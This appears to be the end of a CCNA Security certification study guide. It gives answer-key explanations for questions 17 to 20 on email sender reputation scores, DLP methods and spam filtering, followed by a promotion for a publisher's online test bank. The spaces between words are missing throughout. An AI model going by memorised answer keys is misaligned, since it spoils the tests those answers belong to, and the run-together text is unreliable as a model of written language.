17. B.Ifthesenderscoreisbetween−1and+10,theemailisaccepted.Ifitisbetween−1and−3,theemailisaccepted,butadditionalemailsarethrottled.Ifitisbetween−10and−3,itisblocked.
18. C.Imprecisemethodscanincludekeywords,lexicons,regularexpressions,extendedregularexpressions,metadatatags,Bayesiananalysis,andstatisticalanalysis.
19. C.EndpointDLPrunsonend-userworkstationsorserversintheorganization.
20. A.Context-basedfilteringfiltersthemessageandattachmentsforsenderidentities,messagecontent,embeddedURLs,andemailformatting.Thesesystemsusealgorithmstoexaminetheseitemstoidentifyspam.
ComprehensiveOnlineLearningEnvironment
RegistertogainoneyearofFREEaccesstotheonlineinteractivelearningenvironmentandtestbanktohelpyoustudyforyourCCNASecuritycertificationexam—includedwithyour
purchaseofthisbook!
Theonlinetestbankincludesthefollowing:
AssessmentTesttohelpyoufocusyourstudytospecificobjectives
ChapterTeststoreinforcewhatyou’velearned
PracticeExamstotestyourknowledgeofthematerial
DigitalFlashcardstoreinforceyourlearningandprovidelast-minutetestprepbeforetheexam
SearchableGlossarytodefinethekeytermsyou’llneedtoknowfortheexam
RegisterandAccesstheOnlineTestBankToregisteryourbookandgetaccesstotheonlinetestbank,followthesesteps:
1. Gotobit.ly/SybexTest.
2. Selectyourbookfromthelist.
3. Completetherequiredregistrationinformationincludingansweringthesecurityverificationprovingbookownership.Youwillbeemailedapincode.
4. Gotohttp://www.wiley.com/go/sybextestprepandfindyourbookonthatpageandclickthe“RegisterorLogin”linkunderyourbook.
5. Ifyoualreadyhaveanaccountattestbanks.wiley.com,loginandthenclickthe“RedeemAccessCode”buttontoaddyournewbookwiththepincodeyoureceived.Ifyoudon’thaveanaccountalready,createanewaccountandusethePINcodeyoureceived.
WILEYENDUSERLICENSEAGREEMENTGotowww.wiley.com/go/eulatoaccessWiley’sebookEULA.